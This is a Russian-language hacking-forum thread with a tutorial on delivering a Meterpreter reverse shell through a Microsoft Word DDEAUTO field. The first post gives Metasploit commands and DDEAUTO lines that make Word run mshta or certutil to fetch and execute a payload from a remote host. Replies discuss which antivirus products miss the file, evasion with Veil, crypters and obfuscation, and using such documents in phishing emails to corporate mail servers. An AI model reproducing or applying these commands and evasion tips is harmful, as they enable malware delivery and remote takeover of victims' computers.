1. Набираем команду codeby webinar. Набираем команду для организации и проведения вебинаров. Подробнее ...

    Скрыть объявление
  2. Требуются разработчики и тестеры для проекта codebyOS. Требования для участия в проекте: Знание принципов работы ОС на базе Linux; Знание Bash; Крайне желательное знание CPP, Python, Lua; Навыки системного администрирования. Подробнее ...

    Скрыть объявление
  3. Получи 30.000 рублей. Для получения денег необходимо принять участие в конкурсе авторов codeby. С условиями и призами можно ознакомиться на этой странице ...

    Внимание! Регистрация авторов на конкурс закрыта.

    Скрыть объявление

Meterpreter сессия через Microsoft Word

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем adm2, 9 ноя 2017.

  1. adm2

    adm2 Member
    Премиум

    Репутация:
    1
    Регистрация:
    5 июл 2017
    Сообщения:
    20
    Симпатии:
    21
    Добрый день.
    В двух словах покажу как получить сессию meterpreter используя встроенную функцию Microsoft Office DDE
    Почерпнуть немного информации о том что это можно тут:
    https://xakep.ru/2017/10/13/microsoft-office-dde/

    Информация предоставлена для ознакомления, используйте на свой страх и риск.

    Нам понадобится Kali linux и какая-нибудь винда (любая от XP до windows 10) с установленным на нём пакетом microsoft office.

    Приступим:
    Качаем пакет и копируем его в каталог metasploit
    Код:
    wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
    cp dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
    Запускаем metasploit и на всякий обновляем модули
    msf > reload_all
    msf > use exploit/windows/dde_delivery
    Подгружаем полезную нагрузку
    msf exploit(dde_delivery) > set payload windows/meterpreter/reverse_tcp
    msf exploit(dde_delivery) > set lhost 192.168.6.30 (тут ваш IP)
    msf exploit(dde_delivery) > exploit

    Вывод будет следующим:
    Meterpreter сессия через Microsoft Word
    И нам нужны последние строки, которые мы и вставляем в ворд
    У меня это
    Код:
    DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.6.30:8080/dOwU9wGE10np3"
    Вот гифка куда и как нужно ето воткнуть

    Дальнейшие действия понятны: доставляем этот файл на атакуемый компьютер и запускаем
    При открытии будут выскакивать различного рода предупреждения, но ничего связанного с безопасностью там не сказано, но некоторые антивирусы уже будут ругаться на файл.
    Meterpreter сессия через Microsoft Word

    Meterpreter сессия через Microsoft Word

    Meterpreter сессия через Microsoft Word

    После открытия файла прилетит заветная сессия meterpreter
    Meterpreter сессия через Microsoft Word

    Многие антивирусы уже реагируют на файл. Проверка на nodistribute.com
    https://NoDistribute.com/result/image/rkvTgVliH2mEFy4JLhANd1.png

    Meterpreter сессия через Microsoft Word

    Спасибо за внимание)
    P.S. Первый раз пишу статью на форум, посему наверное немного сумбурная подача)

    --- Добавлено 13 ноя 2017. Первое сообщение размещено 9 ноя 2017 ---
    Альтернативный код для загрузки файлов, можно использовать не только meterpreter, но и любой продукт для пост-эксплуатации. Empire например

    Код:
    DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://192.168.0.50/payload.exe && payload"
     

    Вложения:

    #1 adm2, 13 ноя 2017
    Последнее редактирование: 13 ноя 2017
    Vertigo, Kalina, ghost и 6 другим нравится это.
  2. iamxcite

    iamxcite New Member

    Репутация:
    0
    Регистрация:
    3 ноя 2017
    Сообщения:
    1
    Симпатии:
    0
    Спасибо, интересно!
     
  3. OneDollar

    OneDollar Well-Known Member
    Премиум

    Репутация:
    4
    Регистрация:
    7 сен 2017
    Сообщения:
    119
    Симпатии:
    49
    Аваст и есет от жизни отстали..) Нихрена не видят :) Касперыч глазастый
     
    nerfy и Kalina нравится это.
  4. adm2

    adm2 Member
    Премиум

    Репутация:
    1
    Регистрация:
    5 июл 2017
    Сообщения:
    20
    Симпатии:
    21
    Любопытно что шестой есет потом всё таки нашёл подозрительную активность в файле, а вот пятый до сих пор слепой котёнок

    Если использовать нагрузку, созданную через Veil (про собственные крипторы вообще молчу) и подгрузить её таким образом:
    > DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://192.168.0.50/payload.exe && payload"
    То здесь даже шестой нод ничего не видит.
     
    Kalina нравится это.
  5. OneDollar

    OneDollar Well-Known Member
    Премиум

    Репутация:
    4
    Регистрация:
    7 сен 2017
    Сообщения:
    119
    Симпатии:
    49
    А что на счет "собственные крипторы" может поделишься ?)
     
  6. adm2

    adm2 Member
    Премиум

    Репутация:
    1
    Регистрация:
    5 июл 2017
    Сообщения:
    20
    Симпатии:
    21
    У меня их пока нет, на этой тропе я всего полгода, после того как чуть не поразил WannaCry (спасло то что ПК не смотрели напрямую в инет)
    Посему пришлось окунуться в область информационной безопасности поглубже дабы знать где, как, через что, откуда и каким образом может проникнуть какой-нибудь зловред)
     
  7. remez

    remez Active Member

    Репутация:
    0
    Регистрация:
    3 ноя 2016
    Сообщения:
    28
    Симпатии:
    12
    Авиру не проведешь.
     
  8. Hackaton192

    Hackaton192 Active Member

    Репутация:
    0
    Регистрация:
    30 янв 2017
    Сообщения:
    25
    Симпатии:
    22
    Есть методы хорошей обфускации DDE-шек, тут на форуме была про них статья! с помощью функции QUOTE, гугл всем в помощь!
     
    Underwood нравится это.
  9. JoeBlack0001

    JoeBlack0001 New Member

    Репутация:
    0
    Регистрация:
    21 сен 2017
    Сообщения:
    1
    Симпатии:
    0
    Тут можно смело втыкать рекламу криптора =))
     
  10. OneDollar

    OneDollar Well-Known Member
    Премиум

    Репутация:
    4
    Регистрация:
    7 сен 2017
    Сообщения:
    119
    Симпатии:
    49
    Свяжись лучше сначала с администрацией..) прежде чем рекламу выдвигать
     
  11. Underwood

    Underwood Well-Known Member
    Grey Team

    Репутация:
    5
    Регистрация:
    10 ноя 2016
    Сообщения:
    75
    Симпатии:
    243
    Статью можно почитать по ссылке. Кстати, в версиях MSWord не позднее 2007, можно также использовать frames и framesets, которые используются для загрузки произвольного html кода с любой веб-страницы в поле frame документа.
     
    WebWare Team нравится это.
  12. OneDollar

    OneDollar Well-Known Member
    Премиум

    Репутация:
    4
    Регистрация:
    7 сен 2017
    Сообщения:
    119
    Симпатии:
    49
    Вчера через юникорн создал файл, чекается 10тью антивирусами. Из топовых только касперский. Позор есет и авасту) Может я как-то натупил, но вряд ли. Смотрите:
    https://nodistribute.com/result/kMdAzIPl5npY9EQ2KJRtV
     
    Underwood нравится это.
  13. Hackaton192

    Hackaton192 Active Member

    Репутация:
    0
    Регистрация:
    30 янв 2017
    Сообщения:
    25
    Симпатии:
    22
    Думаю все кто в теме давно уже юзают данный инструмент, всем пожалуйста:
    https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

    На мой взгляд тема с DDE, уступает тем же макросам, так как ПЕРВОЕ уж очень много раз приходится нажать на OK. А ВТОРОЕ с точки соц.инженерии жертва не видит документа и ее сложно заинтересовать(только лишь названием документа получается и то,что в теле письма,если мы рассылаем через e-mail), поэтому я юзаю хорошо обфусцированные макросы(пусть они на известные почтовые сервисы доходят хуже, но на корпоративные почтовики залетают как-надо)
     
    Underwood, IioS, valerian38 и ещё 1-му нравится это.
  14. krylovlf

    krylovlf Active Member
    Премиум

    Репутация:
    0
    Регистрация:
    25 окт 2016
    Сообщения:
    29
    Симпатии:
    8
    За статью спасибо! но было бы интереснее узнать что нибудь про CVE-2017-11882
     
Загрузка...

Поделиться этой страницей